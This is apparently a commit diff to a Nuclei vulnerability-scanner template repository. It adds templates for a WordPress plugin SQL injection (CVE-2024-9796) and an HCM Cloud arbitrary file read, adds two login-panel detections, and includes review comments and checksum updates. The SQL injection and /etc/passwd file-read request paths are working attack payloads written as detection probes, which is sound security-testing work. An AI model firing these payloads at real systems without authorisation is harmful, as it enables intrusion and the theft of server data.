- https://github.com/RandomRobbieBF/CVE-2024-9796
- https://nvd.nist.gov/vuln/detail/CVE-2024-9796
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9796
cwe-id: CWE-89
epss-score: 0.00106
epss-percentile: 0.44161
metadata:
max-request: 1
verified: true
vendor: mathieu_chartier
product: wp-advanced-search
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-advanced-search/"
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist"
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: database_name
regex:
- "([a-zA-Z0-9_]+)\\.wp_users"
# digest: 4a0a0047304502204d1fa41448e33d7bdc708a0c0cfefcb5cb74c19e863fdd219d62933fbfed9427022100979820fcbf072d12baefa23aca5ee99edaac434379017e9b00feb2abab3de987:922c64590222798bb761d5b6d8e72950
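Review bot: The extractor is named `database_name` but has no `group`, so it presumably emits the whole match including the `.wp_users` suffix; the CVE-2024-9593 template in this commit sets `group: 1` for the same purpose, and adding `group: 1` here would return only the captured name. The matcher also depends on the error `Table '<db>.wp_users' doesn't exist`, which suggests the check only fires on sites where that table name does not resolve. A line in `description` stating this would help readers understand that a negative result does not prove the plugin is patched.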


@ -0,0 +1,30 @@
id: 1password-scim-panel
info:
name: 1Password SCIM Bridge - Panel
author: Splint3r7
severity: info
description: |
1Password SCIM Bridge Login was detected.
classification:
cwe-id: CWE-200
metadata:
max-request: 1
shodan-query: http.title:"1Password SCIM Bridge Login"
tags: panel,1password,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains_any(body, "1Password SCIM Bridge Login", "scim-bridge-logo")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220273efa2c962c1449fec38b3d098131d1a6662c122f71a2546cf4457f462e2fc5022100ec141b841154859bb27c6ad26e87c9a5e934fdf5ad1f71da7d12216d506c96ef:922c64590222798bb761d5b6d8e72950
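Review bot: `classification: cwe-id: CWE-200` labels a plain login-panel detection as an information exposure, which overstates an `info` finding and differs from reolink-panel in the same commit, which carries no classification. I would drop the `classification` block. If the panel has been checked against a live instance, add `verified: true` under `metadata`, as the other panel template does.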


@ -0,0 +1,30 @@
id: reolink-panel
info:
name: Reolink Panel - Detect
author: s4e-io
severity: info
description: |
Reolink panel was discovered.
metadata:
verified: true
max-request: 1
fofa-query: "Reolink"
shodan-query: title:"Reolink"
tags: panel,login,reolink,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body, "Reolink</title>")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100972074f41e35ce0c2c5e9c66f417208fe38d99127faac925683889cbe52c9700022100dbb2f66c6e5448bfa41dce0ecae14894006d99baa678514d395d2db8acbf344f:922c64590222798bb761d5b6d8e72950
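Review bot: The only content check, `contains(body, "Reolink</title>")`, is a case-sensitive title suffix. Any page that returns 200 with a title ending in "Reolink" is therefore reported as a device panel, including one reached through the two redirects allowed by `host-redirects: true`. That is likely to produce false positives on reseller, support or documentation pages, and the bare `fofa-query: "Reolink"` is just as broad. I would add a second condition taken from the device login page itself, for example an asset path or script name, written as `contains(body, "<DEVICE_UI_MARKER>")`. The marker is a placeholder because the page does not show one.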


@ -0,0 +1,30 @@
id: hcm-cloud-lfi
info:
name: HCM Cloud - Arbitrary File Read
author: s4e-io
severity: high
description: |
HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
reference:
- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
- https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-859381597"
tags: hcm-cloud,lfi,hcm
http:
- method: GET
path:
- "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd"
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/octet-stream")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022026d56dc5db7d021f9588ce83480002e6e15ec8a5b9d2247a75272f80ddc3e6d302210090d0666fb6a8b8fa1f467c96c1103565befbdbfda3b88aa72ab7266ae13f84e7:922c64590222798bb761d5b6d8e72950
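Review bot: The `info` block of this `severity: high` template has no `classification` and no `remediation`, so a finding carries no weakness ID for reporting and no guidance for the owner of the affected host. I would add `classification:` with `cwe-id: CWE-22` and a `remediation:` line such as `Restrict the model_report download endpoint to authenticated users and validate the requested path against an allow-list; apply the vendor fix when available.` The description is also hard to read and could name the endpoint: `HCM-Cloud exposes /api/model_report/file/download, whose ext parameter allows reading arbitrary files from the server.` The probe only requests `/etc/passwd`, so a negative result on a non-Linux deployment does not rule the issue out; that is worth a comment in the template.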


@ -29,6 +29,10 @@ cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:3a67a177c3537b361b26b549a
cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:660261dce36382f203ec7e16e01d2e29f9bf7836
cloud/aws/cloudwatch/cw-alarm-action-set.yaml:b02b7e970b71be76717b5fc7e132b23adb5048e0
cloud/aws/cloudwatch/cw-alarms-actions.yaml:f0198d619bebd6afa41568d0c8c9bac456261021
cloud/aws/dms/dms-multi-az.yaml:cb3e1113188a1770d764c97a19ea3d608a3ff718
cloud/aws/dms/dms-public-access.yaml:e8eee10542c4723e8cec23eb25eaa536f8ba4fbd
cloud/aws/dms/dms-version-upgrade.yaml:969893df5f59cb6d06ce7e156028baa3a23682b0
cloud/aws/ebs/ebs-encryption-disabled.yaml:c7ccebdd432abae71c809226591cf9ace3cacad3
cloud/aws/ec2/ec2-imdsv2.yaml:bb7909c4b9b433dd90c343b3a03122f9c5c310a0
cloud/aws/ec2/ec2-public-ip.yaml:5fb5ee7dd9d51781a4a2903a0cb05b21fa586f85
cloud/aws/ec2/ec2-sg-egress-open.yaml:047f551aa108926349f69ba8d47189d88b7aab01
@ -54,6 +58,8 @@ cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33
cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a
cloud/aws/ec2/publicly-shared-ami.yaml:49e3f4939b9991f5ac9db99fbb7f7caba021227d
cloud/aws/ec2/unencrypted-aws-ami.yaml:35fc4a61e70120df3aafba92b4153ffa5b8c92b6
cloud/aws/firehose/firehose-server-destination-encryption.yaml:8d734f21761ffb41988d3d216b7e9f7aa7bd5f48
cloud/aws/firehose/firehose-server-side-encryption.yaml:5e78f1b9a1d2eeb44b87f9af6d9699a493b4e80a
cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9
cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8
cloud/aws/iam/iam-full-admin-privileges.yaml:ab5d0948a725aa5a9a1059d6b7c0ae9f5d846d06
@ -419,8 +425,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a
cves.json:1f9c64298a7fdb69876fad1267c4671f73a5a024
cves.json-checksum.txt:b7786a85233a460e34b9cd4fb0f0b8d7d9290e4f
cves.json:d801cb10fa8d00e27a3846145d6634c66bafccf8
cves.json-checksum.txt:4143244c4fec9f8bedb78c0ceb14a368b532782c
dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@ -3672,6 +3678,7 @@ http/cves/2023/CVE-2023-6909.yaml:49445ba4c9f3657098a5b90e0139e370ad4b0e22
http/cves/2023/CVE-2023-6977.yaml:92c599645f0079a1292d86ff4c56dddc787b5818
http/cves/2023/CVE-2023-6989.yaml:f42110a36f2bf7b8c62a72a752a69c8db52480c5
http/cves/2023/CVE-2023-7028.yaml:0ce7fc4083aa99ba9c914582ed064b84b50d22a2
http/cves/2024/CVE-2016-9299.yaml:9d44b30c8d0646f6e537110619b64cea85d33025
http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2
http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad
http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a
@ -3873,7 +3880,7 @@ http/cves/2024/CVE-2024-4885.yaml:4ed235e0b33138d6382df49594465c551a54c788
http/cves/2024/CVE-2024-48914.yaml:b27547a769516a91b02ffd72ac8f8ce32da86482
http/cves/2024/CVE-2024-4940.yaml:5ce4ed65bd103d8a7791414015bb8cf507885305
http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a
http/cves/2024/CVE-2024-49757.yaml:249c629be1603354f68060f37cf6398221f30222
http/cves/2024/CVE-2024-49757.yaml:5a48ed3ba12227bae818ea35a200145217b35d3f
http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68
http/cves/2024/CVE-2024-5217.yaml:4fadf394def4c4b705871b805aced6715c7a2a06
http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c
@ -3940,10 +3947,13 @@ http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747
http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738
http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd
http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f
http/cves/2024/CVE-2024-9061.yaml:9c44d7fb4a27fd9f40a791d617b7e21981772b70
http/cves/2024/CVE-2024-9234.yaml:b8d98cd3fce5725e967dfb1c4cc22b4eefcbcd7c
http/cves/2024/CVE-2024-9463.yaml:80dc0d8f82b6d69a77dbdbfcc20988bbcfbc83f1
http/cves/2024/CVE-2024-9465.yaml:cc95c8e163ea7ba487f5a09bddc953485559de1c
http/cves/2024/CVE-2024-9593.yaml:b5592584dd80c8cd4e33f192f0142a28e11ce557
http/cves/2024/CVE-2024-9617.yaml:7cb4fee2a032853c8bdab68ab3ab8fad718c3a23
http/cves/2024/CVE-2024-9796.yaml:63320eed168e12210192edea9a986bee738d4ae5
http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda
@ -4167,6 +4177,7 @@ http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287
http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4
http/default-logins/zebra/zebra-printer-default-login.yaml:e8e3085df0ca4f9062f0c10855e1c1b6908ec189
http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17
http/exposed-panels/1password-scim-panel.yaml:65a0e1ff296b07247ef0292119dc45de6332f9df
http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e
http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a
http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984
@ -4866,7 +4877,7 @@ http/exposed-panels/ollama-llm-panel.yaml:d03925e708d955ad60baf6e1114cae81bbc0c2
http/exposed-panels/olt-web-interface.yaml:bd13acc8c195cbf26aa41fe65aa499740e6332e4
http/exposed-panels/olympic-panel.yaml:858b214bfbb07e460ff29ba93cada9e90b22cef6
http/exposed-panels/omniampx-panel.yaml:56105e601d3cc844fb99879aa995176faac92dcf
http/exposed-panels/onedev-panel.yaml:778521f437f02b656bcb661a0799a2974d43ea55
http/exposed-panels/onedev-panel.yaml:6aec846d56b8cb5b0aceddf0267a858c53c7cc90
http/exposed-panels/onlyoffice-login-panel.yaml:044f6d420976bc9f2a4063cfe33d22ab3b4ea351
http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028
http/exposed-panels/open-stack-dashboard-login.yaml:68ffbeb500d7df7d11de2f399d5579983e714ef7
@ -5015,6 +5026,7 @@ http/exposed-panels/regify-panel.yaml:7af46ff8dbd0743a178b02b1c8ce2c2206ec5ae5
http/exposed-panels/remedy-axis-login.yaml:b676bbce4e0ea774bff50f84e9bce159c790ca6f
http/exposed-panels/remkon-manager-panel.yaml:7aaca85bb4d742edb3cafe770445522d2ff3b31d
http/exposed-panels/remote-ui-login.yaml:0335d3e84ec1b5927b4e71e30de2fcacd40a33c3
http/exposed-panels/reolink-panel.yaml:3608e84b6525ab89f7b9a809e5e4ff9330e850fc
http/exposed-panels/repetier-server-panel.yaml:6b57a80bb46f006aa09fa69262e84ead2ba276c0
http/exposed-panels/reportico-admin-panel.yaml:a456a00c6ced7e1c1096511440e45372e017a0b8
http/exposed-panels/residential-gateway-login.yaml:6245630106f122c0ed93fcc79e8ee754e90b2bbc
@ -8479,6 +8491,7 @@ http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:6c4f889193935b21ef25bdb52479408
http/vulnerabilities/gradio/gradio-lfi.yaml:34910ba1e5d2d62b9415ff89e9632e0a97198745
http/vulnerabilities/gradio/gradio-ssrf.yaml:c81b4d852de367dd51aa3c7a60a11672e92da709
http/vulnerabilities/grafana/grafana-file-read.yaml:953afdafb26e334177fd5a29c88434674d13b6e2
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml:fb9dd54d8b49f84fc193bada0f5a4de09f7864b7
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
@ -9539,7 +9552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:cce82f1b617c661f4ecb3a3b9b70f4aef6ecd42f
templates-checksum.txt:b3593609a5c788fe4bf0ad23ac7b9030d7031bb4
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4